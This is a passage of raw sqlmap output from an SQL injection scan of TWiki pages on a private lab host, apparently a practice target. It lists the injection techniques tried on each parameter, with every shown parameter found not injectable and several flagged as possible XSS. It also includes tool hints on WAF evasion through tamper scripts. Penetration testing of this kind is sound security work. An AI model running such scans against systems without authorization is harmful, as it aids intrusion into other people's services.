[18:23:50] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:23:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:24:03] [WARNING] URI parameter '#1*' is not injectable | |
[18:24:03] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 19: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiSite?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:24:03] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiSite?skin=print' | |
[18:24:03] [INFO] testing connection to the target URL | |
[18:24:04] [INFO] testing if the target URL is stable | |
[18:24:04] [INFO] target URL is stable | |
[18:24:04] [INFO] testing if GET parameter 'skin' is dynamic | |
[18:24:05] [INFO] confirming that GET parameter 'skin' is dynamic | |
[18:24:05] [INFO] GET parameter 'skin' is dynamic | |
[18:24:05] [INFO] heuristics detected web page charset 'ascii' | |
[18:24:05] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[18:24:05] [INFO] testing for SQL injection on GET parameter 'skin' | |
[18:24:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:24:05] [WARNING] reflective value(s) found and filtering out | |
[18:24:06] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:24:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:24:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:24:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:24:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:24:09] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:24:09] [INFO] testing 'MySQL inline queries' | |
[18:24:09] [INFO] testing 'PostgreSQL inline queries' | |
[18:24:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:24:09] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:24:10] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:24:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:24:11] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:24:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:24:12] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:24:13] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:24:13] [INFO] testing 'Oracle AND time-based blind' | |
[18:24:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:24:14] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:24:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:24:28] [WARNING] GET parameter 'skin' is not injectable | |
[18:24:28] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 20: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiSite?rev1=1.22&rev2=1.21 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:24:28] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiSite?rev1=1.22&rev2=1.21' | |
[18:24:28] [INFO] testing connection to the target URL | |
[18:24:28] [INFO] testing if the target URL is stable | |
[18:24:29] [INFO] target URL is stable | |
[18:24:29] [INFO] testing if GET parameter 'rev1' is dynamic | |
[18:24:29] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[18:24:29] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[18:24:29] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks | |
[18:24:29] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[18:24:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:24:29] [WARNING] reflective value(s) found and filtering out | |
[18:24:31] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:24:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:24:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:24:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:24:33] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:24:34] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:24:34] [INFO] testing 'MySQL inline queries' | |
[18:24:34] [INFO] testing 'PostgreSQL inline queries' | |
[18:24:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:24:34] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:24:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:24:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:24:36] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:24:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:24:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:24:38] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:24:38] [INFO] testing 'Oracle AND time-based blind' | |
[18:24:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:24:39] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:24:47] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:24:55] [WARNING] GET parameter 'rev1' is not injectable | |
[18:24:55] [INFO] testing if GET parameter 'rev2' is dynamic | |
[18:24:55] [INFO] confirming that GET parameter 'rev2' is dynamic | |
[18:24:55] [INFO] GET parameter 'rev2' is dynamic | |
[18:24:55] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[18:24:55] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks | |
[18:24:55] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[18:24:55] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:24:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:24:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:24:59] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:24:59] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:25:00] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:25:01] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:25:01] [INFO] testing 'MySQL inline queries' | |
[18:25:02] [INFO] testing 'PostgreSQL inline queries' | |
[18:25:02] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:25:02] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:25:03] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:25:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:25:04] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:25:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:25:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:25:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:25:07] [INFO] testing 'Oracle AND time-based blind' | |
[18:25:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:25:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:25:24] [WARNING] GET parameter 'rev2' is not injectable | |
[18:25:24] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 21: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiSite?rev=1.21 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:25:24] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiSite?rev=1.21' | |
[18:25:24] [INFO] testing connection to the target URL | |
[18:25:24] [INFO] testing if the target URL is stable | |
[18:25:25] [INFO] target URL is stable | |
[18:25:25] [INFO] testing if GET parameter 'rev' is dynamic | |
[18:25:25] [INFO] confirming that GET parameter 'rev' is dynamic | |
[18:25:25] [INFO] GET parameter 'rev' is dynamic | |
[18:25:25] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[18:25:25] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[18:25:25] [INFO] testing for SQL injection on GET parameter 'rev' | |
[18:25:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:25:25] [WARNING] reflective value(s) found and filtering out | |
[18:25:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:25:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:25:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:25:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:25:29] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:25:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:25:30] [INFO] testing 'MySQL inline queries' | |
[18:25:30] [INFO] testing 'PostgreSQL inline queries' | |
[18:25:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:25:30] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:25:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:25:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:25:32] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:25:32] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:25:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:25:34] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:25:34] [INFO] testing 'Oracle AND time-based blind' | |
[18:25:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:25:35] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:25:42] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:25:50] [WARNING] GET parameter 'rev' is not injectable | |
[18:25:50] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[18:25:50] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/TWikiSite?rev1=1.21&rev2=1.20' | |
[18:25:50] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/TWikiSite?rev=1.20' | |
URL 22: | |
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiSite?template=oopsmore¶m1=1.22¶m2=1.22 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:25:50] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/TWikiSite?template=oopsmore¶m1=1.22¶m2=1.22' | |
[18:25:50] [INFO] testing connection to the target URL | |
[18:25:50] [INFO] testing if the target URL is stable | |
[18:25:51] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[18:25:51] [INFO] testing if GET parameter 'template' is dynamic | |
[18:25:51] [INFO] confirming that GET parameter 'template' is dynamic | |
[18:25:51] [INFO] GET parameter 'template' is dynamic | |
[18:25:51] [INFO] heuristics detected web page charset 'ascii' | |
[18:25:51] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[18:25:52] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[18:25:52] [INFO] testing for SQL injection on GET parameter 'template' | |
[18:25:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:25:52] [WARNING] reflective value(s) found and filtering out | |
[18:25:53] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:25:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:25:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:25:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:25:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:25:55] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:25:55] [INFO] testing 'MySQL inline queries' | |
[18:25:55] [INFO] testing 'PostgreSQL inline queries' | |
[18:25:55] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:25:55] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:25:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:25:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:25:56] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:25:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:25:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:25:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:25:58] [INFO] testing 'Oracle AND time-based blind' | |
[18:25:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:25:59] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:26:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:26:10] [WARNING] GET parameter 'template' is not injectable | |
[18:26:10] [INFO] testing if GET parameter 'param1' is dynamic | |
[18:26:10] [WARNING] GET parameter 'param1' does not appear dynamic | |
[18:26:10] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[18:26:10] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[18:26:10] [INFO] testing for SQL injection on GET parameter 'param1' | |
[18:26:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:26:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:26:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:26:13] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:26:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:26:15] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:26:15] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:26:15] [INFO] testing 'MySQL inline queries' | |
[18:26:16] [INFO] testing 'PostgreSQL inline queries' | |
[18:26:16] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:26:16] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:26:16] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:26:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:26:18] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:26:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:26:19] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:26:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:26:20] [INFO] testing 'Oracle AND time-based blind' | |
[18:26:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:26:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:26:39] [WARNING] GET parameter 'param1' is not injectable | |
[18:26:39] [INFO] testing if GET parameter 'param2' is dynamic | |
[18:26:40] [WARNING] GET parameter 'param2' does not appear dynamic | |
[18:26:40] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[18:26:40] [INFO] testing for SQL injection on GET parameter 'param2' | |
[18:26:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:26:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:26:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:26:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:26:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:26:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:26:45] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:26:45] [INFO] testing 'MySQL inline queries' | |
[18:26:45] [INFO] testing 'PostgreSQL inline queries' | |
[18:26:45] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:26:45] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:26:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:26:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:26:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:26:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:26:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:26:49] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:26:50] [INFO] testing 'Oracle AND time-based blind' | |
[18:26:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:27:00] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:27:09] [WARNING] GET parameter 'param2' is not injectable | |
[18:27:09] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 23: | |
GET http://192.168.1.113:80/twiki/bin/rename/TWiki/TWikiSite?newweb=TWiki&newtopic=TWikiWeb&confirm=on | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:27:09] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rename/TWiki/TWikiSite?newweb=TWiki&newtopic=TWikiWeb&confirm=on' | |
[18:27:09] [INFO] testing connection to the target URL | |
[18:27:10] [INFO] testing if the target URL is stable | |
[18:27:10] [INFO] target URL is stable | |
[18:27:10] [INFO] testing if GET parameter 'newweb' is dynamic | |
sqlmap got a 302 redirect to 'http://192.168.1.113/twiki/bin/oops/5911/TWikiWeb'. Do you want to follow? [Y/n] Y | |
[18:27:10] [INFO] confirming that GET parameter 'newweb' is dynamic | |
[18:27:11] [INFO] GET parameter 'newweb' is dynamic | |
[18:27:11] [WARNING] heuristic (basic) test shows that GET parameter 'newweb' might not be injectable | |
[18:27:11] [INFO] testing for SQL injection on GET parameter 'newweb' | |
[18:27:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:27:11] [INFO] heuristics detected web page charset 'ascii' | |
[18:27:11] [WARNING] reflective value(s) found and filtering out | |
[18:27:13] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:27:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:27:14] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:27:15] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:27:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:27:17] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:27:17] [INFO] testing 'MySQL inline queries' | |
[18:27:17] [INFO] testing 'PostgreSQL inline queries' | |
[18:27:18] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:27:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:27:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:27:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:27:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:27:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:27:22] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:27:22] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:27:23] [INFO] testing 'Oracle AND time-based blind' | |
[18:27:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:27:24] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[18:27:35] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:27:45] [WARNING] GET parameter 'newweb' is not injectable | |
[18:27:45] [WARNING] GET parameter 'newtopic' does not appear dynamic | |
[18:27:45] [WARNING] heuristic (basic) test shows that GET parameter 'newtopic' might not be injectable | |
[18:27:45] [INFO] testing for SQL injection on GET parameter 'newtopic' | |
[18:27:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:27:49] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:27:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:27:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:27:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:27:53] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:27:54] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:27:55] [INFO] testing 'MySQL inline queries' | |
[18:27:55] [INFO] testing 'PostgreSQL inline queries' | |
[18:27:55] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:27:55] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:27:56] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:27:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:27:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:27:59] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:28:00] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:28:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:28:02] [INFO] testing 'Oracle AND time-based blind' | |
[18:28:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:28:19] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:28:34] [WARNING] GET parameter 'newtopic' is not injectable | |
[18:28:34] [WARNING] GET parameter 'confirm' does not appear dynamic | |
[18:28:35] [WARNING] heuristic (basic) test shows that GET parameter 'confirm' might not be injectable | |
[18:28:35] [INFO] testing for SQL injection on GET parameter 'confirm' | |
[18:28:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:28:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:28:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:28:39] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:28:40] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:28:41] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:28:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:28:43] [INFO] testing 'MySQL inline queries' | |
[18:28:43] [INFO] testing 'PostgreSQL inline queries' | |
[18:28:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:28:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:28:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:28:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:28:46] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:28:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:28:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:28:49] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:28:50] [INFO] testing 'Oracle AND time-based blind' | |
[18:28:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[18:29:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[18:29:21] [WARNING] GET parameter 'confirm' is not injectable | |
[18:29:21] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 24: | |
GET http://192.168.1.113:80/twiki/bin/edit/Main/WebTopicList?t=1441456603 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[18:29:21] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/WebTopicList?t=1441456603' | |
[18:29:21] [INFO] testing connection to the target URL | |
[18:29:22] [INFO] testing if the target URL is stable | |
[18:29:22] [INFO] target URL is stable | |
[18:29:22] [INFO] testing if GET parameter 't' is dynamic | |
[18:29:23] [WARNING] GET parameter 't' does not appear dynamic | |
[18:29:23] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[18:29:23] [INFO] testing for SQL injection on GET parameter 't' | |
[18:29:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[18:29:24] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[18:29:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[18:29:25] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[18:29:25] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[18:29:26] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[18:29:27] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[18:29:27] [INFO] testing 'MySQL inline queries' | |
[18:29:27] [INFO] testing 'PostgreSQL inline queries' | |
[18:29:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[18:29:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[18:29:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[18:29:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[18:29:29] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[18:29:29] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[18:29:30] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[18:29:30] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[18:29:31] [INFO] testing 'Oracle AND time-based blind' | |
[18:29:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
